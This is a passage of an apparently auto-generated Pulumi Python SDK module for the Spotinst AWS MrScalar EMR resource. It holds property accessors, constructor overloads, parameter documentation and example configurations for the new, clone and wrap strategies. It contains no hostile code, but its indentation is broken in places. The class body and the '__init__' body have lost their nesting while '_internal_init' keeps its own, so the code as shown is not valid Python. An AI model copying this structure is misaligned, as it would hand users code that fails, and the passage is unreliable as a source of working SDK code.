def task_unit(self, value: Optional[pulumi.Input[str]]):
    """Set the capacity unit for the task group (`instance` or `weight`)."""
    pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
    """
    Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
    """
    return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
    """Set the CloudWatch-metric-based termination policies."""
    pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
    """
    Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
    """
    return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
    """Set the termination-protection flag for cluster instances."""
    pulumi.set(self, "termination_protected", value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
    """
    Whether the cluster is visible to all users.
    """
    return pulumi.get(self, "visible_to_all_users")
@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
    """Set the cluster's visible-to-all-users flag."""
    pulumi.set(self, "visible_to_all_users", value)
class MrScalar(pulumi.CustomResource):
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             additional_info: Optional[pulumi.Input[str]] = None,
             additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
             availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
             cluster_id: Optional[pulumi.Input[str]] = None,
             configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
             core_desired_capacity: Optional[pulumi.Input[int]] = None,
             core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
             core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
             core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             core_lifecycle: Optional[pulumi.Input[str]] = None,
             core_max_size: Optional[pulumi.Input[int]] = None,
             core_min_size: Optional[pulumi.Input[int]] = None,
             core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
             core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
             core_unit: Optional[pulumi.Input[str]] = None,
             custom_ami_id: Optional[pulumi.Input[str]] = None,
             description: Optional[pulumi.Input[str]] = None,
             ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
             ec2_key_name: Optional[pulumi.Input[str]] = None,
             expose_cluster_id: Optional[pulumi.Input[bool]] = None,
             instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
             job_flow_role: Optional[pulumi.Input[str]] = None,
             keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
             log_uri: Optional[pulumi.Input[str]] = None,
             managed_primary_security_group: Optional[pulumi.Input[str]] = None,
             managed_replica_security_group: Optional[pulumi.Input[str]] = None,
             master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
             master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
             master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             master_lifecycle: Optional[pulumi.Input[str]] = None,
             master_target: Optional[pulumi.Input[int]] = None,
             name: Optional[pulumi.Input[str]] = None,
             provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
             region: Optional[pulumi.Input[str]] = None,
             release_label: Optional[pulumi.Input[str]] = None,
             repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
             retries: Optional[pulumi.Input[int]] = None,
             scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
             security_config: Optional[pulumi.Input[str]] = None,
             service_access_security_group: Optional[pulumi.Input[str]] = None,
             service_role: Optional[pulumi.Input[str]] = None,
             steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
             strategy: Optional[pulumi.Input[str]] = None,
             tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
             task_desired_capacity: Optional[pulumi.Input[int]] = None,
             task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
             task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
             task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             task_lifecycle: Optional[pulumi.Input[str]] = None,
             task_max_size: Optional[pulumi.Input[int]] = None,
             task_min_size: Optional[pulumi.Input[int]] = None,
             task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
             task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
             task_unit: Optional[pulumi.Input[str]] = None,
             termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
             termination_protected: Optional[pulumi.Input[bool]] = None,
             visible_to_all_users: Optional[pulumi.Input[bool]] = None,
             __props__=None):
    """
    Provides a Spotinst AWS MrScaler resource.
    ## Example Usage
    ### New Strategy
    ```python
    import pulumi
    import pulumi_spotinst as spotinst
    sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
        additional_info="{'test':'more information'}",
        additional_primary_security_groups=["sg-456321"],
        additional_replica_security_groups=["sg-123654"],
        applications=[
            spotinst.aws.MrScalarApplicationArgs(
                name="Ganglia",
                version="1.0",
            ),
            spotinst.aws.MrScalarApplicationArgs(
                name="Hadoop",
            ),
            spotinst.aws.MrScalarApplicationArgs(
                args=[
                    "fake",
                    "args",
                ],
                name="Pig",
            ),
        ],
        availability_zones=["us-west-2a:subnet-123456"],
        bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
            bucket="sample-emr-test",
            key="bootstrap-actions.json",
        )],
        configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
            bucket="example-bucket",
            key="configurations.json",
        )],
        core_desired_capacity=1,
        core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        core_ebs_optimized=False,
        core_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        core_lifecycle="ON_DEMAND",
        core_max_size=1,
        core_min_size=1,
        core_unit="instance",
        custom_ami_id="ami-123456",
        description="Testing MrScaler creation",
        ec2_key_name="test-key",
        instance_weights=[
            spotinst.aws.MrScalarInstanceWeightArgs(
                instance_type="t2.small",
                weighted_capacity=10,
            ),
            spotinst.aws.MrScalarInstanceWeightArgs(
                instance_type="t2.medium",
                weighted_capacity=90,
            ),
        ],
        job_flow_role="EMR_EC2_ExampleRole",
        keep_job_flow_alive=True,
        log_uri="s3://example-logs",
        managed_primary_security_group="sg-123456",
        managed_replica_security_group="sg-987654",
        master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
            size_in_gb=30,
            volume_type="gp2",
            volumes_per_instance=1,
        )],
        master_ebs_optimized=True,
        master_instance_types=["c3.xlarge"],
        master_lifecycle="SPOT",
        master_target=1,
        provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
            timeout=15,
            timeout_action="terminateAndRetry",
        ),
        region="us-west-2",
        release_label="emr-5.17.0",
        repo_upgrade_on_boot="NONE",
        retries=2,
        security_config="example-config",
        service_access_security_group="access-example",
        service_role="example-role",
        steps_files=[spotinst.aws.MrScalarStepsFileArgs(
            bucket="example-bucket",
            key="steps.json",
        )],
        strategy="new",
        tags=[spotinst.aws.MrScalarTagArgs(
            key="Creator",
            value="Pulumi",
        )],
        task_desired_capacity=1,
        task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        task_ebs_optimized=False,
        task_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        task_lifecycle="SPOT",
        task_max_size=30,
        task_min_size=0,
        task_unit="instance",
        termination_protected=False)
    ```
    ### Clone Strategy
    ```python
    import pulumi
    import pulumi_spotinst as spotinst
    sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
        availability_zones=["us-west-2a:subnet-12345678"],
        cluster_id="j-123456789",
        core_desired_capacity=1,
        core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        core_ebs_optimized=False,
        core_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        core_lifecycle="ON_DEMAND",
        core_max_size=1,
        core_min_size=1,
        core_unit="instance",
        description="Testing MrScaler creation",
        expose_cluster_id=True,
        master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
            size_in_gb=30,
            volume_type="gp2",
            volumes_per_instance=1,
        )],
        master_ebs_optimized=True,
        master_instance_types=["c3.xlarge"],
        master_lifecycle="SPOT",
        master_target=1,
        region="us-west-2",
        strategy="clone",
        tags=[spotinst.aws.MrScalarTagArgs(
            key="Creator",
            value="Pulumi",
        )],
        task_desired_capacity=1,
        task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        task_ebs_optimized=False,
        task_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        task_lifecycle="SPOT",
        task_max_size=30,
        task_min_size=0,
        task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
            action_type="",
            adjustment="1",
            cooldown=60,
            dimensions={
                "name": "name-1",
                "value": "value-1",
            },
            evaluation_periods=10,
            max_target_capacity="1",
            maximum="10",
            metric_name="CPUUtilization",
            minimum="0",
            namespace="AWS/EC2",
            operator="gt",
            period=60,
            policy_name="policy-name",
            statistic="average",
            target="5",
            threshold=10,
            unit="",
        )],
        task_unit="instance")
    pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
    pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
    ```
    ### Wrap Strategy
    ```python
    import pulumi
    import pulumi_spotinst as spotinst
    example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
        cluster_id="j-27UVDEHXL4OQM",
        description="created by Pulumi",
        region="us-west-2",
        strategy="wrap",
        task_desired_capacity=2,
        task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
            size_in_gb=20,
            volume_type="gp2",
            volumes_per_instance=1,
        )],
        task_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        task_lifecycle="SPOT",
        task_max_size=4,
        task_min_size=0,
        task_unit="instance")
    ```
    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
    :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
    :param pulumi.Input[str] cluster_id: The MrScaler cluster id.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
    :param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
    :param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
    :param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    :param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
    :param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]] core_scaling_down_policies: Policies for scaling the core group down.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]] core_scaling_up_policies: Policies for scaling the core group up.
    :param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
    :param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
    :param pulumi.Input[str] description: The MrScaler description.
    :param pulumi.Input[int] ebs_root_volume_size: The size of the EBS root device volume.
    :param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
    :param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
    :param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
    :param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
    :param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
    :param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
    :param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
    :param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
    :param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    :param pulumi.Input[int] master_target: Number of instances in the master group.
    :param pulumi.Input[str] name: The application name.
    :param pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']] provisioning_timeout: Timeout settings applied while provisioning cluster capacity (`timeout` and `timeout_action`). See example above for usage.
    :param pulumi.Input[str] region: The MrScaler region.
    :param pulumi.Input[str] release_label: The EMR release label (for example, `emr-5.17.0`).
    :param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
    :param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
    :param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
    :param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
    :param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
    :param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
    :param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
    :param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
    :param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    :param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
    :param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]] task_scaling_down_policies: Policies for scaling the task group down.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]] task_scaling_up_policies: Policies for scaling the task group up.
    :param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
    :param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
    :param pulumi.Input[bool] visible_to_all_users: Whether the cluster is visible to all users.
    """
    ...
@overload
def __init__(__self__,
             resource_name: str,
             args: MrScalarArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Provides a Spotinst AWS MrScaler resource.
    ## Example Usage
    ### New Strategy
    ```python
    import pulumi
    import pulumi_spotinst as spotinst
    sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
        additional_info="{'test':'more information'}",
        additional_primary_security_groups=["sg-456321"],
        additional_replica_security_groups=["sg-123654"],
        applications=[
            spotinst.aws.MrScalarApplicationArgs(
                name="Ganglia",
                version="1.0",
            ),
            spotinst.aws.MrScalarApplicationArgs(
                name="Hadoop",
            ),
            spotinst.aws.MrScalarApplicationArgs(
                args=[
                    "fake",
                    "args",
                ],
                name="Pig",
            ),
        ],
        availability_zones=["us-west-2a:subnet-123456"],
        bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
            bucket="sample-emr-test",
            key="bootstrap-actions.json",
        )],
        configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
            bucket="example-bucket",
            key="configurations.json",
        )],
        core_desired_capacity=1,
        core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        core_ebs_optimized=False,
        core_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        core_lifecycle="ON_DEMAND",
        core_max_size=1,
        core_min_size=1,
        core_unit="instance",
        custom_ami_id="ami-123456",
        description="Testing MrScaler creation",
        ec2_key_name="test-key",
        instance_weights=[
            spotinst.aws.MrScalarInstanceWeightArgs(
                instance_type="t2.small",
                weighted_capacity=10,
            ),
            spotinst.aws.MrScalarInstanceWeightArgs(
                instance_type="t2.medium",
                weighted_capacity=90,
            ),
        ],
        job_flow_role="EMR_EC2_ExampleRole",
        keep_job_flow_alive=True,
        log_uri="s3://example-logs",
        managed_primary_security_group="sg-123456",
        managed_replica_security_group="sg-987654",
        master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
            size_in_gb=30,
            volume_type="gp2",
            volumes_per_instance=1,
        )],
        master_ebs_optimized=True,
        master_instance_types=["c3.xlarge"],
        master_lifecycle="SPOT",
        master_target=1,
        provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
            timeout=15,
            timeout_action="terminateAndRetry",
        ),
        region="us-west-2",
        release_label="emr-5.17.0",
        repo_upgrade_on_boot="NONE",
        retries=2,
        security_config="example-config",
        service_access_security_group="access-example",
        service_role="example-role",
        steps_files=[spotinst.aws.MrScalarStepsFileArgs(
            bucket="example-bucket",
            key="steps.json",
        )],
        strategy="new",
        tags=[spotinst.aws.MrScalarTagArgs(
            key="Creator",
            value="Pulumi",
        )],
        task_desired_capacity=1,
        task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        task_ebs_optimized=False,
        task_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        task_lifecycle="SPOT",
        task_max_size=30,
        task_min_size=0,
        task_unit="instance",
        termination_protected=False)
    ```
    ### Clone Strategy
    ```python
    import pulumi
    import pulumi_spotinst as spotinst
    sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
        availability_zones=["us-west-2a:subnet-12345678"],
        cluster_id="j-123456789",
        core_desired_capacity=1,
        core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        core_ebs_optimized=False,
        core_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        core_lifecycle="ON_DEMAND",
        core_max_size=1,
        core_min_size=1,
        core_unit="instance",
        description="Testing MrScaler creation",
        expose_cluster_id=True,
        master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
            size_in_gb=30,
            volume_type="gp2",
            volumes_per_instance=1,
        )],
        master_ebs_optimized=True,
        master_instance_types=["c3.xlarge"],
        master_lifecycle="SPOT",
        master_target=1,
        region="us-west-2",
        strategy="clone",
        tags=[spotinst.aws.MrScalarTagArgs(
            key="Creator",
            value="Pulumi",
        )],
        task_desired_capacity=1,
        task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
            size_in_gb=40,
            volume_type="gp2",
            volumes_per_instance=2,
        )],
        task_ebs_optimized=False,
        task_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        task_lifecycle="SPOT",
        task_max_size=30,
        task_min_size=0,
        task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
            action_type="",
            adjustment="1",
            cooldown=60,
            dimensions={
                "name": "name-1",
                "value": "value-1",
            },
            evaluation_periods=10,
            max_target_capacity="1",
            maximum="10",
            metric_name="CPUUtilization",
            minimum="0",
            namespace="AWS/EC2",
            operator="gt",
            period=60,
            policy_name="policy-name",
            statistic="average",
            target="5",
            threshold=10,
            unit="",
        )],
        task_unit="instance")
    pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
    pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
    ```
    ### Wrap Strategy
    ```python
    import pulumi
    import pulumi_spotinst as spotinst
    example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
        cluster_id="j-27UVDEHXL4OQM",
        description="created by Pulumi",
        region="us-west-2",
        strategy="wrap",
        task_desired_capacity=2,
        task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
            size_in_gb=20,
            volume_type="gp2",
            volumes_per_instance=1,
        )],
        task_instance_types=[
            "c3.xlarge",
            "c4.xlarge",
        ],
        task_lifecycle="SPOT",
        task_max_size=4,
        task_min_size=0,
        task_unit="instance")
    ```
    :param str resource_name: The name of the resource.
    :param MrScalarArgs args: The arguments to use to populate this resource's properties. See the keyword-argument overload of this constructor for per-property documentation.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MrScalarArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       additional_info: Optional[pulumi.Input[str]] = None,
                       additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
                       availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
                       cluster_id: Optional[pulumi.Input[str]] = None,
                       configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
                       core_desired_capacity: Optional[pulumi.Input[int]] = None,
                       core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
                       core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                       core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       core_lifecycle: Optional[pulumi.Input[str]] = None,
                       core_max_size: Optional[pulumi.Input[int]] = None,
                       core_min_size: Optional[pulumi.Input[int]] = None,
                       core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
                       core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
                       core_unit: Optional[pulumi.Input[str]] = None,
                       custom_ami_id: Optional[pulumi.Input[str]] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
                       ec2_key_name: Optional[pulumi.Input[str]] = None,
                       expose_cluster_id: Optional[pulumi.Input[bool]] = None,
                       instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
                       job_flow_role: Optional[pulumi.Input[str]] = None,
                       keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
                       log_uri: Optional[pulumi.Input[str]] = None,
                       managed_primary_security_group: Optional[pulumi.Input[str]] = None,
                       managed_replica_security_group: Optional[pulumi.Input[str]] = None,
                       master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
                       master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                       master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       master_lifecycle: Optional[pulumi.Input[str]] = None,
                       master_target: Optional[pulumi.Input[int]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
                       region: Optional[pulumi.Input[str]] = None,
                       release_label: Optional[pulumi.Input[str]] = None,
                       repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
                       retries: Optional[pulumi.Input[int]] = None,
                       scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
                       security_config: Optional[pulumi.Input[str]] = None,
                       service_access_security_group: Optional[pulumi.Input[str]] = None,
                       service_role: Optional[pulumi.Input[str]] = None,
                       steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
                       strategy: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
                       task_desired_capacity: Optional[pulumi.Input[int]] = None,
                       task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
                       task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
